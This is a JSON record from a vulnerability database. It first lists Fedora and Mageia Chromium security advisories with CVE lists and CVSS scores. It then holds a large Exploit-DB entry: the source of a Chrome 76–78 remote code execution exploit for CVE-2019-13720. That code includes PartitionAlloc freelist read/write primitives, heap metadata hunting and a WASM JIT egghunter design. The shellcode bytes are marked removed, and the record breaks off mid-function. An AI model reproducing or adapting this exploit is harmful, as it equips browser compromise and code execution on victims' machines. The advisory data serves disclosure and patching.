"NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-04-01T01:51:39", "id": "FEDORA:C67773052A4D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BBT54RKAE5XLMWSHLVUKJ7T2XHHYMXLH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-09T21:22:25", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: chromium-78.0.3904.87-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-09T21:22:25", "id": "FEDORA:3608E6051CC4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EIIDTZXEBWMS5CZ6MW6PPU7EZ4VIEFZY/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:39", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-20T01:15:37", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-89.0.4389.82-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-20T01:15:37", "id": "FEDORA:A017F3074280", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FE5SIKEVYTMDCC5OSXGOM2KRPYLHYMQX/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-15T03:20:57", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-78.0.3904.87-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", 
"CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2019-11-15T03:20:57", "id": "FEDORA:AC09F608BFF0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E4PBGVMZ355Z7XR6CLI4W42NBIXY3JHS/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-11-15T03:55:58", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-78.0.3904.87-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", 
"CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2019-11-15T03:55:58", "id": "FEDORA:2B88A6092506", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZTDUMER334IGKQEKTUQHRW5PUGM6YINZ/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "The updated packages fix security vulnerabilities. At least one of them is known to be actively exploited. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-17T11:01:53", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", 
"CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "modified": "2021-03-17T11:01:52", "id": "MGASA-2021-0142", "href": "https://advisories.mageia.org/MGASA-2021-0142.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Chromium-browser 78.0.3904.87 fixes security issues: Multiple flaws were found in the way Chromium 77.0.3865.120 processes various types of web content, where loading a web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information. 
(CVE-2019-13699, CVE-2019-13700, CVE-2019-13701, CVE-2019-13702, CVE-2019-13703, CVE-2019-13704, CVE-2019-13705, CVE-2019-13706, CVE-2019-13707, CVE-2019-13708, CVE-2019-13709, CVE-2019-13710, CVE-2019-13711, CVE-2019-13713, CVE-2019-13714, CVE-2019-13715, CVE-2019-13716, CVE-2019-13717, CVE-2019-13718, CVE-2019-13719, CVE-2019-13720, CVE-2019-13721) \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-07T23:36:48", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13699", "CVE-2019-13700", "CVE-2019-13701", "CVE-2019-13702", "CVE-2019-13703", "CVE-2019-13704", "CVE-2019-13705", "CVE-2019-13706", "CVE-2019-13707", "CVE-2019-13708", "CVE-2019-13709", "CVE-2019-13710", "CVE-2019-13711", "CVE-2019-13713", "CVE-2019-13714", "CVE-2019-13715", "CVE-2019-13716", "CVE-2019-13717", "CVE-2019-13718", "CVE-2019-13719", "CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-07T23:36:48", "id": "MGASA-2019-0320", "href": "https://advisories.mageia.org/MGASA-2019-0320.html", "cvss": {"score": 6.8, 
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-03T11:59:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "exploitdb", "title": "Google Chrome 78.0.3904.70 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-13720", "CVE-2019-13720"], "modified": "2022-05-11T00:00:00", "id": "EDB-ID:50917", "href": "https://www.exploit-db.com/exploits/50917", "sourceData": "# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution\r\n# Date: 2022-05-03\r\n# Exploit Author: deadlock (Forrest Orr)\r\n# Type: RCE\r\n# Platform: Windows\r\n# Website: https://forrest-orr.net\r\n# Twitter: https://twitter.com/_ForrestOrr\r\n# Vendor Homepage: https://www.google.com/chrome/\r\n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip\r\n# Versions: Chrome 76 - 78.0.3904.70\r\n# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64\r\n# CVE: CVE-2019-13720\r\n# Bypasses: DEP, High Entropy ASLR, CFG, CET\r\n# Github: 
https://github.com/forrest-orr/WizardOpium\r\n\r\n<html>\r\n<script>\r\n/*;; --------------------------------------------------------------------- |\r\n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Author: deadlock (Forrest Orr) - 2022 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Licensed under GNU GPLv3 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |\r\n;;;; 64-bit with CPU core counts: |\r\n;;;; ~ 16 cores (non-virtualized) | works |\r\n;;;; ~ 4 cores (virtualized) | works |\r\n;;;; ~ 2 cores (virtualized) | works |\r\n;;;; ~ 1 core (virtualized) | fails |\r\n;;;; |\r\n;;;; All of these tests finished successfully with a 95%+ success rate |\r\n;;;; with the exception of the 1 core tests, which fail with a 100% |\r\n;;;; frequency. Due to the nature of the exploit as both a UAF highly |\r\n;;;; sensitive to the state of the heap and a race condition, it appears |\r\n;;;; that a single core is unable to reliably reproduce the UAF or any |\r\n;;;; kind of consistency in the heap between executions. |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Sandboxing |\r\n;;;; ~ Chrome uses an isolated content child proces running under a |\r\n;;;; restricted token below Low Integrity to render JavaScript. |\r\n;;;; ~ Child process creation is restricted via Windows exploit |\r\n;;;; mitigation features on the OS level for Chrome renderers. 
|\r\n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |\r\n;;;; sandbox escape (this was limited to Windows 7 since in newer |\r\n;;;; versions of Windows win32k syscalls are locked in Chrome for |\r\n;;;; security purposes). |\r\n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute |\r\n;;;; the WinExec shellcode within this exploit source. |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Notes |\r\n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |\r\n;;;; for both infoleaks and R/W primitives. |\r\n;;;; ~ The exploit should in theory work in any version of Chrome up to |\r\n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |\r\n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |\r\n;;;; initialized resulting in the creation of a single page of +RWX |\r\n;;;; JIT memory. This is then overwritten with a 673 byte egghunter |\r\n;;;; shellcode. |\r\n;;;; ~ The egghunter will scan through all committed +RW regions of |\r\n;;;; private memory within the compromised chrome.exe renderer process |\r\n;;;; and mark any region it identifies as +RWX which contains the egg |\r\n;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |\r\n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |\r\n;;;; array prefixed by the following egg QWORD bytes: |\r\n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |\r\n;;;; --------------------------------------------------------------------- |\r\n;;;; ## Credits |\r\n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |\r\n;;;; chain in the wild. 
|\r\n;;;; -------------------------------------------------------------------- */\r\n\r\nconst Shellcode = new Uint8Array([ /* raw shellcode byte dump removed from this copy */ ]);\r\nconst Egghunter = new Uint8Array([ /* raw egghunter byte dump removed from this copy */ ]);\r\nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.\r\nlet GcPreventer = [];\r\nlet IIRFilters = [];\r\nvar SharedAudioCtx = undefined;\r\nlet FeedforwardSuperPageMetadata = undefined;\r\nlet OutputFloatArray = new Float32Array(10);\r\nlet MutableFreeListAudioBufs = [];\r\nlet DoubleAllocAudioBufs = [];\r\nlet ImageDataArray = [];\r\nconst EnableDebug = true;\r\nconst AlertOutput = false;\r\nvar HelperBuf = new ArrayBuffer(8);\r\nvar HelperDbl = new Float64Array(HelperBuf);\r\nvar HelperDword = new Uint32Array(HelperBuf);\r\nvar HelperBigInt = new BigUint64Array(HelperBuf);\r\nvar HelperUint8 = new Uint8Array(HelperBuf);\r\n\r\nfunction DebugLog(Message) {\r\n if(EnableDebug) {\r\n if(AlertOutput) {\r\n alert(Message);\r\n }\r\n else {\r\n console.log(Message); // In IE, console only works if devtools is open.\r\n }\r\n }\r\n}\r\n\r\nfunction Sleep(delay) {\r\n return new Promise(resolve => setTimeout(resolve, delay))\r\n}\r\n\r\nfunction ReverseBigInt(Val) {\r\n let ReversedVal = BigInt(0);\r\n let TempVal = Val;\r\n\r\n for (let i = 0; i < 8; i++) {\r\n ReversedVal = ReversedVal << BigInt(8);\r\n ReversedVal += TempVal & BigInt(0xFF);\r\n TempVal = TempVal >> BigInt(8);\r\n }\r\n\r\n return ReversedVal;\r\n}\r\n\r\nfunction ClearBigIntLow21(Val) {\r\n let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111\r\n let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000\r\n return 
ClearedVal;\r\n}\r\n\r\nlet GetSuperPageBase = ClearBigIntLow21;\r\n\r\nfunction GetSuperPageMetadata(LeakedPtr) {\r\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\r\n return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page\r\n}\r\n\r\nfunction GetPartitionPageIndex(LeakedPtr) {\r\n let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);\r\n let Index = (LeakedPtr & Low21Mask) >> BigInt(14);\r\n return Index;\r\n}\r\n\r\n\r\nfunction GetPartitionPageMetadata(LeakedPtr) {\r\n let Index = GetPartitionPageIndex(LeakedPtr);\r\n let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));\r\n return partitionPageMetadataPtr;\r\n}\r\n\r\nfunction GetPartitionPageBase(LeakedPtr, Index) {\r\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\r\n let PartitionPageBase = SuperPageBase + (Index << BigInt(14));\r\n return PartitionPageBase;\r\n}\r\n\r\nfunction GC() {\r\n let MyPromise = new Promise(function(GcCallback) {\r\n let Arg;\r\n \r\n for (var i = 0; i < 400; i++) {\r\n new ArrayBuffer(1024 * 1024 * 60).buffer;\r\n }\r\n \r\n GcCallback(Arg);\r\n });\r\n \r\n return MyPromise;\r\n}\r\n\r\n/*\r\nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:\r\n00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????\r\n*/\r\n\r\nfunction LeakQword(FreeListHead, TargetAddress) {\r\n FreeListHead[0] = TargetAddress;\r\n let TempVal = new BigUint64Array;\r\n TempVal.buffer;\r\n GcPreventer.push(TempVal);\r\n return ReverseBigInt(FreeListHead[0]);\r\n}\r\n \r\nfunction WriteQword(FreeListHead, TargetAddress, Val) {\r\n FreeListHead[0] = TargetAddress;\r\n let TempVal = new BigUint64Array(1);\r\n TempVal.buffer;\r\n TempVal[0] = Val;\r\n GcPreventer.push(TempVal);\r\n}\r\n\r\nfunction CreateWasmJITExport() {\r\n /*\r\n After this function returns, a 
new region of memory will appear with a
    single system page of 0x1000 bytes set to RWX for the JIT region for
    this WASM module

    0x00000ACDB6790000:0x40000000 | Private
    0x00000ACDB6790000:0x00001000 | RX  | 0x00000000 | Abnormal private executable memory
    0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory
    */

    var ImportObj = { imports: { imported_func: arg => console.log(arg) } };
    const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
    const WasmCode = new Uint8Array(WasmModuleBytes);
    const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);
    return WasmModule.exports.exported_func;
}

/*
struct __attribute__((packed)) SlotSpanMetadata {
    unsigned long freelist_head;
    unsigned long next_slot_span;
    unsigned long bucket;
    uint32_t marked_full : 1;
    uint32_t num_allocated_slots : 13;
    uint32_t num_unprovisioned_slots : 13;
    uint32_t can_store_raw_size : 1;
    uint32_t freelist_is_sorted : 1;
    uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);
    uint16_t in_empty_cache : 1;
    uint16_t empty_cache_index : 7;
    uint16_t unused2 : (16 - 1 - 7);
};

struct PartitionPage {
    union {
        struct SlotSpanMetadata span;
        size_t raw_size;
        struct PartitionSuperPageExtentEntry head;
        struct {
            char pad[32 - sizeof(uint16_t)];
            uint16_t slot_span_metadata_offset;
        };
    };
};

struct PartitionBucket {
    unsigned long active_slot_spans_head;
    unsigned long empty_slot_spans_head;
    unsigned long decommitted_slot_spans_head;
    uint32_t slot_size;
    uint32_t num_system_pages_per_slot_span : 8;
    uint32_t num_full_slot_spans : 24;
};
*/

function HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {
    for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {
        SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct
        HelperBigInt[0] = SlotSpanMetaAddress;
        DebugLog("... targeting slot span metadata at " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
        BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);
        HelperBigInt[0] = BucketAddress;
        DebugLog("... leaked bucket address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));

        if(BucketAddress != BigInt(0)) {
            BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size
            BucketSize = LeakQword(FreeListHead, BucketAddress);
            HelperBigInt[0] = BucketSize;
            DebugLog("... leaked bucket size is " + HelperDword[1].toString(16) + " " + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));

            if(HelperDword[0] == SlotSize) {
                DebugLog("... found desired slot size! Reading freelist head for SlotSpan...");
                SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct
                HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);
                DebugLog("... leaked slot span freelist address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
                return HelperBigInt[0];
            }
        }
    }
}

function ExecutePayload(FreeListHead) {
    var WasmExport = CreateWasmJITExport();
    let FileReaderObj = new FileReader;
    let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment

    DebugLog("... WASM module and FileReader created.");
    FileReaderObj.onerror = WasmExport;
    let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);

    if (!FileReaderLoaderPtr) {
        DebugLog("... failed to obtain free list head for bucket size 0x140 slot span");
        return;
    }

    HelperBigInt[0] = FileReaderLoaderPtr;
    DebugLog("... estimated a FileReaderLoader alloc address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent
    let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);

    if(ValidationPtr != FileReaderLoaderPtr) {
        HelperBigInt[0] = ValidationPtr;
        DebugLog("... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));

        let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);
        let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));
